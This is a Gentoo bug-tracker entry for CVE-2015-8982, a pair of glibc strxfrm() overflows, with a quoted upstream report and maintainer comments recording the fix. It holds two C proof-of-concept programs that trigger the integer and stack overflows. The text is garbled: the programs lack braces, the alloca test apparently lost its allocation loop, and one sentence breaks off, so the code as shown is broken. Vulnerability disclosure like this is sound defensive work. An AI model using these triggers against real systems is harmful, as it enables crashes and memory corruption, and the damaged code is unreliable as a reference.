Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 540070 (CVE-2015-8982) - <sys-libs/glibc-2.20-r2: multiple overflows in strxfrm()
Summary: <sys-libs/glibc-2.20-r2: multiple overflows in strxfrm()
Alias: CVE-2015-8982
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All Linux
: Normal major (vote)
Assignee: Gentoo Security
Whiteboard: A2 [glsa]
Depends on: CVE-2014-0475 544034
  Show dependency tree
Reported: 2015-02-14 16:03 UTC by Agostino Sarubbo
Modified: 2017-02-15 07:54 UTC (History)
2 users (show)

See Also:
Package list:
Runtime testing required: ---


Note You need to log in before you can comment on or make changes to this bug.
Description Agostino Sarubbo gentoo-dev 2015-02-14 16:03:30 UTC
From ${URL} :

1. Joseph Myers discovered strxfrm is vulnerable to integer overflows
when computing memory allocation sizes (similar to CVE-2012-4412). i.e.
in string/strxfrm_l.c:

  idxarr = (int32_t *) malloc ((srclen + 1) * (sizeof (int32_t) + 1));

Attached strxfrm-int32.c should trigger on 32-bit machines.

2. Shaun Colley discovered strxfrm falls back to an unbounded alloca if
malloc fails making it vulnerable to stack-based buffer overflows
(similar to CVE-2012-4424) [1]. Attached strxfrm-alloca.c should

Both issues were fixed in glibc 2.21 [2] and a quick check shows
vulnerable code appears to go back to at least glibc 2.3.

Please allocate CVEs for these issues. Many thanks.




/* gcc -o strxfrm-alloca strxfrm-alloca.c */

#include <string.h>
#include <stdlib.h>
#include <locale.h>

#define BUFLEN 512000
int main(void)
  char *src = malloc(BUFLEN + 1);
  char *dst = malloc(BUFLEN + 1);
  char *avail = NULL;

  memset(src, 'A', BUFLEN);
  setlocale(LC_ALL, "en_US.UTF-8");

    avail = malloc(BUFLEN);

  int len = strxfrm(dst, src, BUFLEN);
  return 0;

/* gcc -o strxfrm-int32 strxfrm-int32.c */

#include <string.h>
#include <stdlib.h>
#include <locale.h>

#define BUFLEN 858993459

int main(void)
  char *src = malloc(BUFLEN + 1);
  char *dst = malloc(BUFLEN + 1);

  memset(src, 'A', BUFLEN);
  setlocale(LC_ALL, "en_US.UTF-8");

  int len = strxfrm(dst, src, BUFLEN);
  return 0;

@maintainer(s): after the bump, in case we need to stabilize the package, please let us know if it is ready for the stabilization or not.
Comment 1 SpanKY gentoo-dev 2015-02-17 08:09:11 UTC
fix is also in glibc-2.20-r2 now
Comment 2 GLSAMaker/CVETool Bot gentoo-dev 2016-02-17 15:38:36 UTC
This issue was resolved and addressed in
 GLSA 201602-02 at
by GLSA coordinator Tobias Heinlein (keytoaster).